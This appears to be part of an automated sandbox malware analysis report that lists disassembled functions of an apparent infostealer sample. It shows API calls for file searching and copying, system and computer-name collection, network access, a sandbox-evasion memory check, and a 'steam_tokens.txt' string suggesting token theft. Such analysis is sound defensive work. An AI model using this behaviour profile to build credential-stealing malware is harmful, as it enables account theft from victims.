InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,040709D8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,040706D8), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04070708), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,040709D8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,040706D8), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,04070708), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,04077370), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,04070798), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 6BA53060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6BA53095

Part of subcall function 6BA535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6BADF688,00001000), ref: 6BA535D5
Part of subcall function 6BA535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BA535E0
Part of subcall function 6BA535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6BA535FD
Part of subcall function 6BA535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BA5363F
Part of subcall function 6BA535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BA5369F
Part of subcall function 6BA535A0: __aulldiv.LIBCMT ref: 6BA536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA5309F

Part of subcall function 6BA75B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BA756EE,?,00000001), ref: 6BA75B85
Part of subcall function 6BA75B50: EnterCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75B90
Part of subcall function 6BA75B50: LeaveCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75BD8
Part of subcall function 6BA75B50: GetTickCount64.KERNEL32 ref: 6BA75BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6BA530BE

Part of subcall function 6BA530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6BA53127
Part of subcall function 6BA530F0: __aulldiv.LIBCMT ref: 6BA53140

Part of subcall function 6BA8AB2A: __onexit.LIBCMT ref: 6BA8AB30

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 20fb90b60164e07d56b49047095b419f0d82d96fec992b0c67b3f53a19a8a4db
Instruction ID: 92f9ddc31fd03bedf97b863c22545330468ada9219469f7ed8066a1bf3214799
Opcode Fuzzy Hash: 20fb90b60164e07d56b49047095b419f0d82d96fec992b0c67b3f53a19a8a4db
Instruction Fuzzy Hash: 0BF0D632C2878896CE10DF7489421A7B3A4EFEB114B54932DE89552561FB31A2D58391

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

